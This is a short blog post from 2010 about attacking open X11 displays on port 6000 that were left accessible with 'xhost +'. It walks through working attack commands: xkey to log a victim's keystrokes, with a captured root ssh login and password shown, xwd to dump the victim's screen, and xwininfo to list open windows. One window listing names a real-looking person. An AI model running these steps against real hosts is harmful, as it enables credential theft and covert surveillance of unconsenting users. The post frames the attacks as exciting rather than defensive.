Saturday, October 23, 2010

X11 (6000 TCP)

X11 (6000 TCP)
X11 displays are (normally) protected on a network level - that is - there are no usernames and passwords involved. The display is actually a server and it listens on port 6000 (TCP). Control for clients to connect to the server is facilitated with the "xhost" command. By default it is set up in a way that nobody can connect to the display - default deny. As soon as programs are sharing the display (exporting an xterm to your display from another host or whatever) the user of the display have to add the IP number or DNS name of the client that wish to connect by running the command "xhost +". In theory this works perfectly nice, but in the real world people tend to just enter "xhost +" which allows anyone to connect to the display.
A host that is open for anyone to connect to the display is risking a lot, and could possibly be compromised. There are a few nice things to do when you find an open X11 display. One of the most common attacks is to capture all the keystrokes that is entered on the victim's host. The program "xkey" (available from www.hack.co.za) does this very neatly:
> xkey 196.37.xxx.14:0.0
..you wait..time passes...and then:
ssh -l root -<>P 196.37.xxx.1
weirdshitometer
Its clear why we are excited about key captures. A open X11 display can also be "copied" - the root window (the main window) can be copied, and displayed. Each window have a unique ID - you can specify which window you want to copy, but for a start let us get the root window:
> xwd -display 196.37.xxx.14 -root -silent -out /tmp/screendump
..wait for the transfer...
> xv /tmp/screendump
We are using xv to display the screen - xv can read the xwd format straight off. The screen might include some interesting data - if you get a screensaver - bad luck - use finger to see when someone is active. To get a list of windows that are open on the display you might want to issue the command:
> xwininfo -display -all -root | grep \"
(extract)
0x3000e6f "Netscape: Find": ("findDialog_popup" "Netscape") 378x144+536+227 +536+227
0x1c0000c "FvwmButtons": ("FvwmButtons" "FvwmButtons") 385x68+0+0 +635+4
0x2400005 "xload": ("xload" "XLoad") 106x52+2+2 +637+6
0x2000002 "Desktop": ("FvwmPager" "FvwmModule") 105x64+277+2 +912+6
0x30001ec "Netscape": ("communicator-4_72_bin" "Netscape") 1x1+0+0 +0+0
0x3000172 "Communicator Bookmarks for Roelof Temmingh": ("bookmarks" "Netscape") 872x622+10+10 +10+10
Posted by Ana at 11:22 AM

No comments:

Post a Comment

hacking tools

Subscribe to: Post Comments (Atom)